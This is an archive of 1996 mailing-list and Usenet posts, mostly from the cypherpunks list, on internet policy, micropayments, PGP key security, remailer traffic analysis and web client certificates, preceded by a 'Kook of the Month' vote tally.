Marge won in a less vopulumnous but just as hotly contested race.  As you may
know, Marge is offering a list of ALL USNET NEWSGROUPS for a very reasonable
price - JUST the thing we need, unless you know how to look at your
..newsrc file.

Oops.

Vote Count:
Marge Krick - 12 votes
Bill Byers - 11 votes
Brian Dear - 7 votes
John Turco - 7 votes
None of the Above - 5 votes


Hook Line & Sinker for May 1996 - NONE OF THE ABOVE


Apparently, Charles "Chuckie Monster" Newman didn't impress enough people.
Sorry, Charlie.

Vote Count: 

None of the Above - 19 votes
Charles "Chuckie Monster" Newman - 9 votes


The Victor Von Frankenstein Memorial "Wierd Science" Award - THE USA PARLIAMENT

Brainchild of politial mover and reformer James Ogle (joogle@netcom.com),
the USA PAR is the ONLY "fair" and truly representative governing body in 
the US.  Plan?  Scheme? Deluded ravings?  Well, several members of the 
USA PAR (who also post to alt.politics.greens) have voted to disband the 
USA PAR, to replace James Ogle as secretary, and a few dozen other self-
destructive things, yet the ballots just keep rolling out...


Vote Count:

USA PAR - 19 votes
Joly*s 4-Dimensional Speakers - 6 votes
the Music Theory of Alber Silverman -  4 votes
Church of Scientology (write-in) -  4 votes
None of the Above - 15 Votes



THE GOLDEN KILLFILE - DR. JAI MAHRAJ

I'm not gonna explain, because if you don't know, you're better off.
Check soc.culture.hawaiian and a few thousan related newsgroups.

Vote Count:

Jai Mahraj - 30 votes
None of the Above - 13 votes
the alt.religion.scientology spammer (write-in): 1 
LAW DOCTOR JOHN GRUBOR  (write-in): 1
Ted Holden (write-in): 1

OK. That's it for May.  Nominees go to alt.usenet.kooks, and I'll have the 
new nominees post out soon.  

Oh, and by the way, if anyone sees ANYTHING that is nominally from me BUT
is also cross-posted to misc.test, you have my express written permission to 
CANCEL that article.  You know who you are.  And no more naughty forgeries
ok guys?

Matthew Legare
KotM Vote Wrangler





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 7 Jun 1996 13:36:28 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Terrorism Hysteria on the Net
Message-ID: <2.2.32.19960606164902.0072e3f0@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 05:35 PM 6/5/96 -0700, Rich Graves wrote:

>Pooh-poohing the potential risk is not a winning proposition. Pointing out
>that the government's policies against properly secure systems have created
>this house of cards in which we live is. 

A classic case of government being a disease posing as its 
own cure.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nCognito@rigel.cyberpass.net (Anonymous)
Date: Fri, 7 Jun 1996 11:49:17 +0800
To: cypherpunks@toad.com
Subject: Electronic Signatures
Message-ID: <199606061726.KAA05826@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Some of the other info in the AP article seems to be coinciding with 
discussions on the list, so heres a less condensed version of the article. 
Are we still within the limits of the copyrights?  God i hope so. :) 


---------- Forwarded message ----------
TAMPA - Flroida now recognizes electronic signatures as legal and 
binding, however, working out the logistics to implement the new law may 
take some doing.

	Andrew Greenberg, an associate at a large Tampa law firm...says, the 
process saves time by using a computer to handle notary duties that used to 
be done by hand. he expects the mechanics of electronic certifaction to become
simple enough for everybody to use.

	"It will be like the telephone - anybody can use it without 
thinking or knowing how it works," he said.

	Ted Barassi, chairman of the United States Council for 
International Business, is among a pool of experts Florida Secretary of 
State Sandra Mortham is expected to call on to set up the state's 
emerging electronic signature certifacation process.

	The law does not specify how an electronic document must be 
signed, but Barassi and others say it probably will mean coding the text 
and typed signature so they cannot be changed by anyone other than the 
writer.

	No on knows yet just how this will be done, but Mortham's own 
expert on the subject, Gene McGee, envisions a central database that 
tracks coded computer signatures for individuals and businesses. 

	With Florida already a hub of Latin American trade, cybernotary 
lawyers could make the state a mecca for international trade, McGee 
predicts.

_______________________________________________________________________

Its kind of scary when the best minds the state could find are so 
obviously without a clue. One of you politically involved folx could dig 
up addresses for some of our mis-representatives and forward them 
discussion from this list, maybe. :)

Adios..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Fri, 7 Jun 1996 16:12:51 +0800
To: cypherpunks@toad.com
Subject: NSA/CIA to snoop INSIDE the U.S.???
Message-ID: <199606061729.KAA18108@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


What?!  What the *@#!! is wrong with the people who supposedly smart
people representing us?!

Ern

-------- From SJ Mercury:

    NET FEVER ON THE HILL
    
    Published: June 6, 1996
    
    BY RORY J. O'CONNOR
    Mercury News Washington Bureau
    
    WASHINGTON -- The White House wants a coordinated task force to fight
    terrorism on the Internet. Some senators think the CIA should be
    allowed to work hand in hand with the FBI to fight computer crime on
    U.S. soil. Meanwhile, the federal courts are deciding a major First
    Amendment case that might ban certain information from the Net.
    
    The nation's capital is in the throes of Internet fever.
    
    For the past several months, the condition has become acute, and by
    the end of the year the Internet itself may look far different as a
    result: more tightly regulated, more carefully monitored and more
    expensive.
    
    The latest symptom: a suggestion Wednesday for the elimination of laws
    that prohibit U.S.  intelligence agencies -- notably the National
>>> Security Agency and the Central Intelligence Agency -- from snooping   <<<
>>> on home soil. The reason: The potential for computer crime and         <<<
    terrorism is so great, and the Internet so decentralized and
    international, that police and the FBI must combine forces with spy
    agencies in order to successfully analyze the threat and investigate
    criminal activity.
    
    ''If we're going to live in this kind of world, we're going to have to
    link the intelligence world with law enforcement,'' said Sen. Sam
    Nunn, D-Ga.
    
    For many people in government who work on computer and law-enforcement
    issues, the course of the disease seems painfully slow. They often
    describe the Internet as the Wild West that's sorely in need of a good
    marshal. But for many people who use the Internet, the government's
    efforts are moving far ahead of any real knowledge of a technology
    that, two years ago, almost nobody had heard of.
    
    ''There are not dead bodies in the street,'' said Donna L. Hoffman, a
    professor at Vanderbilt University who studies the Internet. ''It just
    doesn't make sense to rush into legislation.''

    [ SNIP ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sclawson@bottles.cs.utah.edu (steve clawson)
Date: Fri, 7 Jun 1996 11:47:35 +0800
To: hallam@ai.mit.edu (Hallam-Baker)
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <31B5C131.167E@ai.mit.edu>
Message-ID: <199606061652.KAA01488@bottles.cs.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hallam-Baker uttered:
> I find Meeks' style somewhat tiresome. It is tabloid jornalism
> rather than reasoned argument. His dislike for the Clinton is 
> well known - he recently accused the administration of being
> fascist. 

     Ok, I'm with you to here...

> I know of no evidence that the Clinton administration
> has a genocide policy, it is an insult to the 10 million civilians
> murdered by Hitler to use the term facist simply as a term of abuse,
> especialy if it is being used as a substitute for an argument.

     While I agree that merely branding Clinton a facist without
backing it up is childish, I really don't see how it's `an insult to
the 10 million civilians murdered by Hitler.'  Come on now!  Facist
does not necessarily imply Hitler, or even Nazi.  The term facist has
roots that go at least as far back as the Romans, and I don't recall a
`genocide policy' as a prerequisite to being facist at any point in
history.  Even if he had called Clinton a Nazi, how does that equate
to insulting those killed by Hitler and his flunkies?  Perhaps calling
someone a Communist also is insulting everyone that Stalin killed?


steve

-- 
// stephen clawson				sclawson@cs.utah.edu
// university of utah			        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 7 Jun 1996 20:01:30 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <2.2.32.19960606051847.006e9b18@mail.aracnet.com>
Message-ID: <Pine.GUL.3.93.960606105007.19086B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Bruce Baugh, who usually knows better, wrote:

> Fascism has no intrinsic link to genocide. It is a theory of economics,
> basically, in which the state has ultimate authority over production and
> distribution without (as in socialism) actually _owning_ the means of
> production or distribution. This is generally accomplished through
> cartelization, the creatin of industry-wide councils in which the
> representatives of the most powerful firms set policy in conjunction with
> the representatives of the government.
> 
> The US has been at least moderately fascist since the 1920s (Hoover was a
> big fan of cartelization, and pushed it actively). While the mechanisms of
> the modern regulatory state aren't those of classic fascist theory, in
> practice most strongly regulated industries in this country operate
> _exactly_ the way fascist theory says they should.
> 
> None of this is secret lore, by the way.

Yes, I'm afraid these ahistorical myths are widespread. What _do_ they teach
in these schools?

Pick up anything by Renzo De Felice to gain a basic historical understanding
of what fascism was about, from someone who was sympathetic to them. 

I'd also recommend a biography of the very influential and gifted American
modernist poet Ezra Pound, who led the Italian fascist propaganda effort
from 1941 to 1943 and spent six months in an American POW camp, followed by
some time in mental hospitals as his rants against jewish conspiracies under
every bed became increasingly incoherent, for his trouble. Like Orwell's
very complicated views towards socialism and Stalinism (see Homage to
Catalonia), e. e. cummings' anti-government pacifism, Whitman's queerness,
and Byron's essential kookiness, this is something your high school english
teacher probably failed to mention.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 7 Jun 1996 11:12:20 +0800
To: A5113643667@attpls.net (Tom Jones)
Subject: Re: Norton Eyes only
In-Reply-To: <8BBE097C>
Message-ID: <199606061700.MAA04547@homeport.org>
MIME-Version: 1.0
Content-Type: text


Tom Jones wrote:

| Has anyone been able to analyse the 'patent pending', 'on-the-fly'
| encryption in Norton's 'For your eyes only'?

Look for the export control warnings.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Fri, 7 Jun 1996 04:50:30 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Norton Eyes only
Message-ID: <8BBE097C>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

Has anyone been able to analyse the 'patent pending', 'on-the-fly'
encryption in Norton's 'For your eyes only'?

Peace.. Tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 7 Jun 1996 11:14:33 +0800
To: alanh@infi.net (Alan Horowitz)
Subject: Re: USA on Feds Cyberteam
In-Reply-To: <Pine.SV4.3.91.960605221206.22400H-100000@larry.infi.net>
Message-ID: <199606061707.MAA04567@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Don't be silly.  The government will just have two groups
doing the same job.  If we're lucky, we'll get a third set of
identical advisories, one from CERT, one from KAYAK, and one from this
new group.

"Your tax dollars at work."

Adam


Alan Horowitz wrote:
| 
| 
| Guess this puts that Carnagie Mellon-based outfit ("Computer Emergency 
| Response Team"?) off the govt contract teat.
| 
| Or maybe they will continue to doa all the trenchwork under contract, but 
| people high up enough in the DC feeding chain to have their own PR 
| appendage, will take the credit?
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 7 Jun 1996 16:49:28 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: How can you protect a remailer's keys?
In-Reply-To: <v02140b00addba12bd414@[205.162.51.35]>
Message-ID: <199606061724.MAA04605@homeport.org>
MIME-Version: 1.0
Content-Type: text


	I'm not sure that, even in theory spreading your key over
multiple machines isa good idea.  The issue to me is reliability.  If
you (the remailer op) have a single machine thats well secured, you
can get a decent idea of its state at a given time.  It is dependant
on those things that the net depends on, DNS and IP being close to
working.  If the remailer is distributed, you've raised the work to
maintain by a factor of N, and increased the probability of the
machine being insecure by the same amount.  You've also reduced
reliability to that of the least reliable machine.

	The better model (imho) is to have 'co-processing' strong
remailers in safe places.  (I think Alex described these here a few
months back; you have a firewall host that talks to the net, and a
second machine attached to it which does the mixing, and passes
messages back to the firewall for distribution.

Adam

Jim McCoy wrote:

| Lance Cottrell writes:

| > The best solution I could come up with (and was willing to write and use)
| > is to specify the passphrase on the command line argument to the compiler
| 
| This is little better than leaving it around in a plaintext file, a pass
| or two with gdb on your binary and I have your private key.
| 
| The "difficult, expensive, and pain in the ass code to write" solution that
| I favor is to use secure multiparty computation to create the remailer.  It
| does not exist on a single host, but is rather the sum of a collection of
| hosts running on widely seperated machines.  It has the same type of drawback
| as a per-execution password entered into a long-lived process (anyone with
| root access to the host can yank it out of memory with little difficulty,)
| but this is spread out across a larger collection of hosts, making the task
| of actually getting the complete password somewhat difficult.  Getting a
| subset of the individual host passwords does not provide any partial
| information about the collective password (similar to secret sharing.)
| The other drawback is that certain operations can be very slow, you end
| up emulating a circuit with a _very_ slow clock (8-10 Hz.  Not MHz, not KHz,
| but 8-10 ticks/second); as compensation you get a word-size that if
| effectively infinite. I have to continue work on a subset of these methods
| for a secure digital poker/card-playing system over the next couple of months
| and if I have some spare time I might see just how difficult creating a
| toolkit for building such virtual circuits really is...

| OTOH, a secure PCMCIA or smart-card will probably end up being a better
| practical solution.

Yeah.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 7 Jun 1996 21:25:29 +0800
To: szabo@netcom.com (Nick Szabo)
Subject: Re: Micropayments: myth?
In-Reply-To: <199606060257.TAA16018@netcom.netcom.com>
Message-ID: <199606061924.MAA10732@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I believe that micropayments will revolutionize business
transactions, and that they are entirely feasible, and have
written on the subject on cpunks intermittently. NS starts
out with some opposite assumptions, which I don't really
think are entirely plausible.

>Consider a feature fairly independent of the particular payment system: 
>the statement of charges.  Here lies a tradeoff here between completeness 
>and complexity.   On the one hand, merely summarizing charges creates 
>the opportunity for salami frauds, allowing widely distributed false or 
>exaggerated microcharges to go undetected.  Furthermore, parties reading 
>only the summaries get no feedback by which they can adjust their behavior
>to minimize costs.

dunno what you are talking about here. with micropayments, why would
you necessarily have statements? you're using an old billing model
on a new paradigm. please establish a *context*. it would be ridiculous
if people submitted "microbills" to companies that responded with
"micropayments". that's the wrong model.

here's how people are talking about micropayments. imagine that
you see a link with a little 5c sign next to it. that means when
you click on it, you are automatically debited 5c. your own browser
can handle keeping your own records. the transaction occurs when
you hit the button. the idea of a bill being submitted, that you seem to
be suggesting with your idea, doesn't make sense. another example:
downloading an FTP file.  the whole idea of billing is thrown away
in favor of immediate processing.

  On the other hand, a statement too complex to
>be easily read also allows fraud, error, and inefficient usage to 
>go unrecognized, because one or both parties cannot understand the 
>rationale for the charges in relation to the presumed agreement on
>terms of service and payment. 

again, this doesn't make sense at all to me. "statements, bills, 
summaries"-- these are all things you require for larger size
transactions. if after a day of net surfing I have spent $3.16,
and my browser kept a record of every case where I paid it out,
what's the problem? the browser does not pay unless I click somewhere.
nobody submits bills to my browser.  all actions are initiated by
me.

>There seems to lie here a fundamental cognitive bottleneck, creating a
>limit to the granularity of billable transaction size whether electronic
>or physical.

"fundamental cognnitive bottleneck"?? not in my brain. perhaps you
should check your own equipment <g>

  One proposed solution to this has been "intelligent 
>agents".  But since these agents are programmed remotely, not by the 
>consumer, it is difficult for the consumer to determine whether the agent
>is acting the consumers' best interests, or in the best interests
>of the counterparty -- perhaps, necessarily, at least as difficult 
>as reading the corresponding full statement of charges. 

it doesn't make sense at all for one to give autonomous capability
to agents to spend money, at least until they have been refined.
I don't see where agents fit into this all in the beginning. you're
putting the cart before the horse. I've never seen micropayments
discussed in the context you are putting them in. (no wonder it
is causing you "cognitive dissonance"). the uses you cite may not
appear until long into the future. in the meantime the model I wrote
about above has no problems you cite that I can tell.

  By
>sleight of hand we may have merely transformed the language of 
>the transaction as it needs to be understood by the party, without
>reducing the complexity to be understood.  Furthermore, the user 
>interface to enable consumers to simply express their sophisticated 
>preferences to an agent is lacking, and may represent another fundamental 
>cognitive bottleneck.

you are tackling a different problem. "how can we get reliable agents
that can be trusted with buying decisions". this has nothing or little
to do with "the feasibility of micropayments". micropayments are not
necessarily tied to agents.

>Telephone companies have found billing to be a major bottleneck.
>By some estimates, up to 50% of the costs of a long distance call
>are for billing, and this is on the order of a $100 billion per year
>market worldwide.  Internet providers have been moving to a flat fee in 
>order to minimize these costs, even though this creates the incentive for 
>network resource overusage.  

imagine a user who controls his own wallet. he knows when he is paying
from that wallet. you seem to have this idea that outsiders could
make queries to that wallet that would be hard for the consumer to
keep track of. this makes no sense to me. the wallet action will always
be tied with some other action. the user picks up the phone to dial
somewhere, and it says, "that will be .3c-- will you pay"? he says
yes. 

>A micropayments system assumes a solution to the billing problem.

as I wrote, I don't imagine a billing system at all in terms of
micropayments. its the wrong model. in a billing system, the bill
and the action are not tied tightly together. person does [x] and
receives bill 3 days later or whatever. with micropayments, you
will have instantaneous transactions.

>If somebody could actually solve the this problem, rather 
>than merely claiming to have solved it via some mysterious
>means ("intelligent agents", et. al.), the savings would be 
>enormous even in existing businesses such as long distance and
>Internet service -- never mind all the new opportunities made
>possible by micropayments.  

wow, I think I've solved it. you can nominate me for some award
now <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 7 Jun 1996 08:50:00 +0800
To: cypherpunks@toad.com
Subject: FTC_spy
Message-ID: <199606061230.MAA16373@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-5-96. WaPo and NYP: 
 
   "Curbs on Cyberspace Ads Proposed." (WaPo) 
 
      Should spam be jammed and cookies be crumbled on the 
      Internet? Technologies with these gustatory short-hand 
      names are at the heart of industry, consumer and 
      government debate over privacy in cyberspace. The 
      Federal Trade Commission brought together major Internet 
      players for a two-day workshop examining the handling of 
      personal consumer information on the Internet, including 
      the practice of using "cookies." 
 
      "Privacy is somewhat of a snake ... but a snake can be 
      an opportunity," said Peter Harter, public policy 
      counsel for Netscape. 
 
   "Voluntary Rules Are Proposed For the Privacy of Internet 
   Users." (NYP) 
 
      But the proposal, made at a Federal Trade Commission 
      hearing on personal privacy in the information age, drew 
      fire from civil liberties groups and others concerned 
      over privacy issues. They argued that self-policing by 
      the industry would not restrain on-line abuses that they 
      said already range from surreptitious monitoring of 
      activities on the Internet to the illegal sale of 
      personal credit histories over the Internet. 
 
 
   FTC_pry 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Fri, 7 Jun 1996 11:38:41 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: whitehouse web incident, viva la web revolution
In-Reply-To: <2.2.32.19960606004349.006d8404@vertexgroup.com>
Message-ID: <9606061632.AA03941@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>>it is an insult to the 10 million civilians
>>murdered by Hitler to use the term facist simply as a term of abuse,

>You insult everyone's intelligence by equating fascism to genocide.
>Suggested reading on the origins, meanings and definition of fascism include
>Friere, Foucault and even the damn Utne Reader among many others.

Meeks was intending to link Clinton's crypto policy to Hitler's. I see
no evidence from Meeks' style that he has read Foucault.

If Meeks wanted to be effective he could have accused Clinton and Freeh of 
seeking to build a Stalininst secret police, or make such an organisation 
possible. It would probably be more accurate to link Freeh to Hoover and point 
out how such power has been abused in the US political system before.

The point was that Meeks' article is not the type to advance our cause. It 
basically says "if you are a democrat you believe in cypto-control". Err yes, 
well done, you have just told half the country that they support the opposite 
policy to the one we are trying to get them to believe in. Plus Bush and Reagan 
advocated the same policy so he is also saying Republicans are against our 
cause.

If you want you could reduce the ranks of those fighting for crypto regulations 
to be removed to members of the Libertarian party, but it would be more 
effective to widen the base.


		Phill








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Fri, 7 Jun 1996 11:43:55 +0800
To: grafolog@netcom.com>
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <Pine.3.89.9606061558.A14010-0100000@netcom9>
Message-ID: <9606061643.AA03971@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>	Call it what you will, the odds of 25 consecutive contracts
>	all showing a profit are miniscle, except under one set of
>	circumstances.  <<  It is something like 1 chance in
>	15 511 210 000 000 000 000 000 000.  >>

Rubbish, 2^25 is 33,554,432. How do you calculate your figures? Or do you just 
make 'em up as you go along?

These are contracts which are expected to pay off more times that they are not, 
they are made on the advice of someone who is an expert in the area. The 
contracts are probably hedging each other in such a way that one contract or the 
other is likely to pay off.

If you hit a favourable market for your strategy you can win big. Problem is 
that after a while others are likley to cotton on to your strategy. 

>	Futures trading on contracts generally show a profit?
>	I guess you are talking about the person who sets up 
>	the trades, and takes a commission on the trades, 
>	regardless of who makes, or ( usually ) loses money. 

Yes, selling rather than buying. If you buy a contract to sell gold at price X 
the chances are that you will lose money most of the time. Many of the 
industries buying those contracts are doing so to protect their exposure to 
price fluctuations in raw materials. Selling contracts is in effect 
underwritting risk of market fluctuations, most times you expect to realise a 
profit, but if you lose you can loose very big indeed.

BTW, I'm told that margin requirements for that market are 5%. So to sell 
$20,000 of contracts you only need to put down $1000. 

		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Fri, 7 Jun 1996 21:44:48 +0800
To: discover@visuallink.com
Subject: ID this 31173 NCR keyboard
Message-ID: <199606062051.NAA08276@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! At 05:46 PM 6/3/96 -0700, you wrote:
! >ncr terminals are the most 31173 D0Dz
! 
! I'm guessing that "D0Dz" is a variant on "dudes";
! is "31173" supposed to be an upside-down "ElliE"?
! Having worked at NCR, I like their cash-machines and cash-registers,
! dislike the Microchannels in some of their PCs, 
! dislike the terminals they used to make (I think SunRiver
! is the current manufacturer for that product line)
! and like their Teradata descendants.
! #				Thanks;  Bill
! # Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
! # http://www.idiom.com/~wcs
! #				Rescind Authority!

Oops.  I wrote that just looking at the keyboard.
Picked it up at Seattle's Ex-Pc for $3.
It's so old, I think it requires a non-PC BIOS.
No manual, labels etc.

Anyone have a clue as to what this is:

NCR

F1 F2          [...]               F18 F19 F20/RESET|
ESC            [...]     TAB             |[five direction keys]
CONTROL Q      [...]     }/] CONTROL     |CLR 7 8 9 /
CAPS_LOCK A    [...]      ~/` |NEW       |  - 4 5 6 *
[up] |/\ Z     [...]   [upup] |LINE      |  + 1 2 3 |NEW
               [space]                   |  0_ 00 . |LINE

It was designed for easily customizing your keytable,
being an actual flat terminal with square keys easily
pulled out and interchanged.

The back of the keyboard has three switches for
the boolean selection of languages: US English,
UK/Int. English, French, German, Swedish/Finnish,
Danish/Norwegian, Spanish, Italian.

So, where to get a NEW keyboard like this:

FLAT, with a full set of SQUARE, EASILY pulled out keys.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Fri, 7 Jun 1996 21:08:45 +0800
To: cypherpunks@toad.com
Subject: ID this 31173 NCR keyboard
Message-ID: <199606062052.NAA08300@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! At 05:46 PM 6/3/96 -0700, you wrote:
! >ncr terminals are the most 31173 D0Dz
! 
! I'm guessing that "D0Dz" is a variant on "dudes";
! is "31173" supposed to be an upside-down "ElliE"?
! Having worked at NCR, I like their cash-machines and cash-registers,
! dislike the Microchannels in some of their PCs, 
! dislike the terminals they used to make (I think SunRiver
! is the current manufacturer for that product line)
! and like their Teradata descendants.
! #				Thanks;  Bill
! # Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
! # http://www.idiom.com/~wcs
! #				Rescind Authority!

Oops.  I wrote that just looking at the keyboard.
Picked it up at Seattle's Ex-Pc for $3.
It's so old, I think it requires a non-PC BIOS.
No manual, labels etc.

Anyone have a clue as to what this is:

NCR

F1 F2          [...]               F18 F19 F20/RESET|
ESC            [...]     TAB             |[five direction keys]
CONTROL Q      [...]     }/] CONTROL     |CLR 7 8 9 /
CAPS_LOCK A    [...]      ~/` |NEW       |  - 4 5 6 *
[up] |/\ Z     [...]   [upup] |LINE      |  + 1 2 3 |NEW
               [space]                   |  0_ 00 . |LINE

It was designed for easily customizing your keytable,
being an actual flat terminal with square keys easily
pulled out and interchanged.

The back of the keyboard has three switches for
the boolean selection of languages: US English,
UK/Int. English, French, German, Swedish/Finnish,
Danish/Norwegian, Spanish, Italian.

So, where to get a NEW keyboard like this:

FLAT, with a full set of SQUARE, EASILY pulled out keys.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 7 Jun 1996 11:55:21 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Security of PGP if Secret Key Available?
In-Reply-To: <Pine.LNX.3.93.960605161013.186C-100000@gak>
Message-ID: <199606061756.NAA16447@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> If the secret key is available then an attacker knows the length
> of p & q.  Admittedly this will not usually help matters much,
> but I still feel that the lengths of p and q should be encrypted
> with the passphrase - perhaps in PGP3.0? (Derek?)

PGPlib has an interface to encrypt the whole keyring, however that
probably isn't going to be fully implemented unless time permits.
This interface allows you to encrypt the WHOLE keyring in a
passphrase, which includes not only the secret components, but the
public components as well.  However I don't know if I'll have the time
to get to it.

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 7 Jun 1996 06:22:16 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Security of PGP if Secret Key Available?
In-Reply-To: <Pine.LNX.3.93.960605161013.186C-100000@gak>
Message-ID: <31B6C91D.28D95ABC@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Wed, 5 Jun 1996, Gary Howland wrote:
> 
> > On Jun 3,  2:36, "Robert A. Hayden" wrote:
> > > However, I got to wondering about the security of PGP assuming somebody
> > > trying to read my PGPed stuff has my 1024-bit secret key.  ie, if I have
> > > it on my personal computer, and somebody gets my secret key, how much
> > > less robust has PGP just become, and what are appropriate and reasonable
> > > steps to take to protect this weakness?
> >
> > If the secret key is available then an attacker knows the length
> > of p & q.  Admittedly this will not usually help matters much,
> > but I still feel that the lengths of p and q should be encrypted
> > with the passphrase - perhaps in PGP3.0? (Derek?)
> 
> I don't see how knowing the exact lengths of p and q will help matters much.

That's what I said.  There are however a few cases where it may help.
Two that spring to mind are the brute force factoring of the
BlackNet key - this may have been faster if half of the potential
factors could have been ignored due to wrong key lengths (although I
suspect this depends upon the factoring algorithm), and the other
is that of identifying low quality keys with a small factor (perhaps
generated by low quality software).

> I don't think it will speed up the factoring time

Again, I would say this depends upon the factoring algorithm.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 7 Jun 1996 12:34:11 +0800
To: nelson@crynwr.com
Subject: Re: Multiple Remailers at a site?
In-Reply-To: <19960604232157.2053.qmail@ns.crynwr.com>
Message-ID: <199606061916.PAA07088@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


nelson@crynwr.com writes:
>Scott Brickner writes:
> > If the remailer does a good job with the delays and shuffling, then
> > it becomes difficult for the analyst to match message a with
> > message b, leaving him with what he already knew (that A and
> > RemailerX have a common interest, as to B and RemailerX, but the
> > interests may be wholly unrelated).
>
>Nope.  Not if each of them runs a remailer.  That's why mixmaster is
>SO WONDERFUL.

Aside from the fact that your point doesn't address mine, it doesn't
address the issue.  The "to" and "from" values that the traffic analyst
will be using are the IP addresses in the packets.  It doesn't matter
whether mixmaster, cypherpunks, or penet remailers are used, they still
use IP addresses.

Retransmission delays slightly reduce the analyst's ability to
correlate inbound and outbound messages.  Mixmaster significantly
reduces it, since all messages are the same size.  Chaining (and
mixmaster's inter-host mixing) means that the analyst needs to target
more machines to get meaningful correlations.

The discussion was about multiple remailers from multiple accounts on
the same machine.  The very existence of the remailer, independent of
issues like shuffling and chaining, is supposed to eliminate
identifying the originator by the content of the message.  Message
shuffling, delays, and chaining are entirely for the purpose of
reducing the information available to the traffic analyst.  If several
remailers are running on the same machine, they may be treated as if
there were only one remailer, for the purpose of traffic analysis.
Getting more traffic going through them just makes the analysts job
easier, because his statistical conclusions are stronger.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Fri, 7 Jun 1996 22:30:28 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: WWW servers.
In-Reply-To: <Pine.SUN.3.91.960606161633.1329A-100000@polaris>
Message-ID: <199606062121.OAA07502@niobe.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Does there currently exist a system which permits webservers to restrict 
> access to clients who have a given certification?

	Yup.

> 
> What is the current certification practice?

	Use either VeriSign, or build your own CA.

> 
> How easy is it to certify a given client?

	Rather easy, using XCert Sentry.

> 
> Are webserver certifications sufficently secure today?

	"sufficiently" by whose definition?

> 
> What are the best servers to use for secure web pages and certification 
> currently in the United States?

	=) Stronghold: The Apache-SSL-US, coupled with XCert
Sentry. What else?

-- 
